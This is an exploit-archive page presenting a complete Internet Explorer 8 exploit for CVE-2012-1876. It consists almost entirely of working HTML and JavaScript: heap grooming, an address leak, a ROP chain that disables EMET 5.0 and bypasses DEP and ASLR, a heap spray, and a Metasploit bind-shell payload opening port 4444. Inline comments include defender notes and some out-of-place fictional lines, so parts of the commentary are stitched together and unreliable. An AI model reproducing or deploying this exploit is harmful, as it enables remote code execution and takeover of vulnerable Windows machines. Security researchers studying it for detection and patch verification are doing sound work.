
Internet Explorer 8 Fixed Col Span ID Full ASLR, DEP, And EMET 5.0 Bypass

🗓️ 29 Sep 2014 00:00:00 — Reported by sickness — Type: packetstorm
🔗 Source: packetstormsecurity.com

Internet Explorer 8 Fixed Col Span ID Full ASLR, DEP, And EMET 5.0 Bypass

`<!--  
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass  
** Exploit Coded by sickness || EMET 5.0 bypass by ryujin  
** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/  
** Affected Software: Internet Explorer 8  
** Vulnerability: Fixed Col Span ID  
** CVE: CVE-2012-1876  
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0  
-->  
  
<html>  
<body>  
<div id="evil"></div>  
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>  
<script language='javascript'>  
  
function strtoint(str) {  
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);  
}  
  
// --- Heap grooming, runs at page load ---  
// Three filler strings are doubled until each is at least 500 UTF-16 units long.  
var free = "EEEE";  
while ( free.length < 500 ) free += free;  
  
var string1 = "AAAA";  
while ( string1.length < 500 ) string1 += string1;  
  
var string2 = "BBBB";  
while ( string2.length < 500 ) string2 += string2;  
  
// fr/al/bl receive 125-unit substrings ((0x100-6)/2), presumably so every  
// string object lands in the same allocation size class; bl[498] is the one  
// read back later by get_leak().  
var fr = new Array();  
var al = new Array();  
var bl = new Array();  
  
// The container is hidden so none of the interleaved elements are rendered.  
var div_container = document.getElementById("evil");  
div_container.style.cssText = "display:none";  
  
// Even indices only (i += 2); one <button> element is created per step.  
// `i` is declared with var here and again below: one script-scoped variable.  
for (var i=0; i < 500; i+=2) {  
fr[i] = free.substring(0, (0x100-6)/2);  
al[i] = string1.substring(0, (0x100-6)/2);  
bl[i] = string2.substring(0, (0x100-6)/2);  
var obj = document.createElement("button");  
div_container.appendChild(obj);  
}  
  
// Release every "free" slot from index 200 on and force a collection each  
// time (CollectGarbage() is IE-specific). Detection note: explicit  
// CollectGarbage() calls combined with size-class-aligned substring  
// allocations are a recognisable heap-grooming pattern for static scanners  
// and JavaScript sandbox heuristics.  
for (var i=200; i<500; i+=2 ) {  
fr[i] = null;  
CollectGarbage();  
}  
  
// Builds the payload and sprays it. `cbuttonlayout` is the base value computed  
// by get_leak(); every ROP entry below is cbuttonlayout plus a fixed offset,  
// rendered as hex and split into two 4-digit halves that unescape() turns back  
// into UTF-16 units. The repeated `var rop = ...` lines are one function-scoped  
// variable reassigned at each step, not fresh bindings.  
// One copy consists of padding, the ROP chain, an EMET-disabling stub, and the  
// bind-shell stub (see the comments below), padded to exactly 1000 units; the  
// copy is then doubled to >= 100000 units, 16 slices of 32K units (the last one  
// 19 units shorter) are concatenated into `onemeg`, and 100 entries copied from  
// it are kept alive in `spray`.  
// Defender notes: the %u-escaped strings, the fixed 1000-unit alignment and the  
// 100-element spray array are the features a content signature or a JS sandbox  
// heuristic would key on. The EMET 5.0 ROP checks are defeated here, so EMET on  
// its own is not a compensating control for an unpatched IE 8; CVE-2012-1876  
// (see header) was fixed by Microsoft's June 2012 IE cumulative update  
// (MS12-037 — confirm against the vendor advisory).  
function heapspray(cbuttonlayout) {  
CollectGarbage();  
var rop = cbuttonlayout + 4161; // RET  
var rop = rop.toString(16);  
var rop1 = rop.substring(4,8);  
var rop2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 11360; // POP EBP  
var rop = rop.toString(16);  
var rop3 = rop.substring(4,8);  
var rop4 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP  
var rop = rop.toString(16);  
var rop5 = rop.substring(4,8);  
var rop6 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12377; // POP EBX  
var rop = rop.toString(16);  
var rop7 = rop.substring(4,8);  
var rop8 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 642768; // POP EDX  
var rop = rop.toString(16);  
var rop9 = rop.substring(4,8);  
var rop10 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12201; // POP ECX --> Changed  
var rop = rop.toString(16);  
var rop11 = rop.substring(4,8);  
var rop12 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 5504544; // Writable location  
var rop = rop.toString(16);  
var writable1 = rop.substring(4,8);  
var writable2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12462; // POP EDI  
var rop = rop.toString(16);  
var rop13 = rop.substring(4,8);  
var rop14 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12043; // POP ESI --> changed  
var rop = rop.toString(16);  
var rop15 = rop.substring(4,8);  
var rop16 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 63776; // JMP EAX  
var rop = rop.toString(16);  
var jmpeax1 = rop.substring(4,8);  
var jmpeax2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 85751; // POP EAX  
var rop = rop.toString(16);  
var rop17 = rop.substring(4,8);  
var rop18 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 4936; // VirtualProtect()  
var rop = rop.toString(16);  
var vp1 = rop.substring(4,8);  
var vp2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]  
var rop = rop.toString(16);  
var rop19 = rop.substring(4,8);  
var rop20 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 234657; // PUSHAD  
var rop = rop.toString(16);  
var rop21 = rop.substring(4,8);  
var rop22 = rop.substring(0,4); // } RET  
  
  
var rop = cbuttonlayout + 408958; // PUSH ESP  
var rop = rop.toString(16);  
var rop23 = rop.substring(4,8);  
var rop24 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 2228408; // POP ECX  
var rop = rop.toString(16);  
var rop25 = rop.substring(4,8);  
var rop26 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1586172; // POP EAX  
var rop = rop.toString(16);  
var rop27 = rop.substring(4,8);  
var rop28 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]  
var rop = rop.toString(16);  
var rop29 = rop.substring(4,8);  
var rop30 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1884912; // PUSH EAX  
var rop = rop.toString(16);  
var rop31 = rop.substring(4,8);  
var rop32 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX  
var rop = rop.toString(16);  
var rop33 = rop.substring(4,8);  
var rop34 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX  
var rop = rop.toString(16);  
var rop35 = rop.substring(4,8);  
var rop36 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 5036248; // ADD ESP,0C  
var rop = rop.toString(16);  
var rop37 = rop.substring(4,8);  
var rop38 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX  
var rop = rop.toString(16);  
var rop39 = rop.substring(4,8);  
var rop40 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI  
var rop = rop.toString(16);  
var rop41 = rop.substring(4,8);  
var rop42 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX  
var rop = rop.toString(16);  
var rop43 = rop.substring(4,8);  
var rop44 = rop.substring(0,4); // } RET  
  
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW  
var getmodulew = getmodulew.toString(16);  
var getmodulew1 = getmodulew.substring(4,8);  
var getmodulew2 = getmodulew.substring(0,4); // } RET  
  
  
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING  
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING  
shellcode+= unescape("%u4141%u4141"); // PADDING  
  
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN  
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN  
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN  
  
// EMET disable part 0x01  
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.  
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN  
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr  
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN  
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u10c4%u076d"); // EMET_STRING_PTR (GetModuleHandle argument)  
shellcode+= unescape("%ua84c%u000a"); // EMET_CONFIG_STRUCT offset  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u10c0%u076d"); // MEM_ADDRESS_PTR (Store EMET base address here for later)  
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX  
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u104c%u076d"); // Get fake DecodePointer argument from the stack and update it with the encoded value  
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX  
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN  
shellcode+= unescape("%u10c0%u076d"); // Get EMET base address Ptr  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u80b0%u0004"); // Get DecodePointer offset from the stack  
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u9090%u9090"); // Fake DecodePointer argument (Will be patched)  
shellcode+= unescape("%u10bc%u076d"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)  
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u0558%u0000"); // ROP Protections offset  
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u0000%u0000"); // NULL  
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN  
// EMET disable part 0x01 end  
  
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)  
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP  
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP  
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP  
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024  
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX  
shellcode+= unescape("%u0040%u0000"); // 0x00000040  
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX  
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location  
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI  
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX  
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX  
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD  
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP  
  
// Store various pointers here  
shellcode+= unescape("%u9090%u9090"); // NOPs  
shellcode+= unescape("%u9090%u14eb"); // NOPs  
shellcode+= unescape("%u4242%u4242"); // Decoded CONFIG structure pointer  
shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*  
shellcode+= "EMET"; // EMET string  
shellcode+= unescape("%u0000%u0000"); // EMET string  
shellcode+= unescape("%u9090%u9090"); // NOPs  
shellcode+= unescape("%u9090%u9090"); // NOPs  
// Store various pointers here  
  
// EMET disable part 0x02  
// MOV EAX,DWORD PTR DS:[076D10BCH]  
// MOV ESI,DWORD PTR [EAX+518H]  
// SUB ESP,2CCH  
// MOV DWORD PTR [ESP],10010H  
// MOV EDI,ESP  
// MOV ECX,2CCH  
// ADD EDI,4  
// SUB ECX,4  
// XOR EAX,EAX  
// REP STOS BYTE PTR ES:[EDI]  
// PUSH ESP  
// PUSH 0FFFFFFFEH  
// CALL ESI  
shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +  
"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +  
"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +  
"%ufe6a%ud6ff");  
shellcode+= unescape("%u9090%u9090"); // NOPs  
shellcode+= unescape("%u9090%u9090"); // NOPs  
// EMET disable part 0x02 end  
  
// Bind shellcode on 4444 :)  
// msf > generate -t js_le  
// windows/shell_bind_tcp - 342 bytes  
// http://www.metasploit.com  
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,  
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=  
// I would keep the shellcode the same size for better reliability :)  
  
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +  
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +  
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +  
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +  
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +  
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +  
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +  
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +  
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +  
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +  
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +  
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +  
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +  
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +  
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +  
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +  
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +  
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +  
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +  
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +  
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +  
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +  
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +  
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +  
"%u006a%uff53%u41d5");  
  
// Total spray should be 1000  
// Detection note: a payload padded to a fixed 1000-unit block size is itself a  
// strong heuristic signal, independent of the byte content.  
var padding = unescape("%u9090");  
while (padding.length < 1000)  
padding = padding + padding;  
var padding = padding.substr(0, 1000 - shellcode.length);  
  
shellcode+= padding;  
  
while (shellcode.length < 100000)  
shellcode = shellcode + shellcode;  
  
var onemeg = shellcode.substr(0, 64*1024/2);  
  
// `i` is not declared here: it is the script-level var from the grooming loops.  
for (i=0; i<14; i++) {  
onemeg += shellcode.substr(0, 64*1024/2);  
}  
  
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));  
  
var spray = new Array();  
  
for (i=0; i<100; i++) {  
spray[i] = onemeg.substr(0, onemeg.length);  
}  
}  
  
// First timed stage: on the <col id="132"> from the markup, keeps width at 41  
// and raises span from the markup's 9 to 19. get_leak() reads bl[498] after this  
// has run, so the two are order-dependent.  
function leak(){  
var leak_col = document.getElementById("132");  
leak_col.width = "41";  
leak_col.span = "19";  
}  
  
// Second timed stage: reads two UTF-16 units from bl[498] at offsets 11..12  
// beyond its original 125-unit length (presumably reachable only because leak()  
// has altered the col span), packs them with strtoint(), subtracts a fixed  
// delta to obtain the base value heapspray() expects, and schedules heapspray()  
// 50 ms later. `hex` is only kept for the commented-out alert().  
function get_leak() {  
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));  
str_addr = str_addr - 1410704;  
var hex = str_addr.toString(16);  
//alert(hex);  
setTimeout(function(){heapspray(str_addr)}, 50);  
}  
  
// Final timed stage: sets an out-of-range width and a larger span on the same  
// <col>; this is the trigger for the fixed-col-span bug named in the header  
// (CVE-2012-1876). Patched builds of IE 8 reject this without memory corruption.  
function trigger_overflow(){  
var evil_col = document.getElementById("132");  
evil_col.width = "1245880";  
evil_col.span = "44";  
}  
  
// Staging via timers: leak() at 400 ms, get_leak() at 450 ms (which itself  
// defers heapspray() by another 50 ms), trigger_overflow() at 700 ms.  
// Timer-chained attribute mutations on one DOM element are a useful  
// dynamic-analysis indicator for this class of page.  
setTimeout(function(){leak()}, 400);  
setTimeout(function(){get_leak()},450);  
setTimeout(function(){trigger_overflow()}, 700);  
  
</script>  
</body>  
</html>  
  
`


6.3 — Medium risk
Vulners AI Score: 6.3
EPSS: 0.87284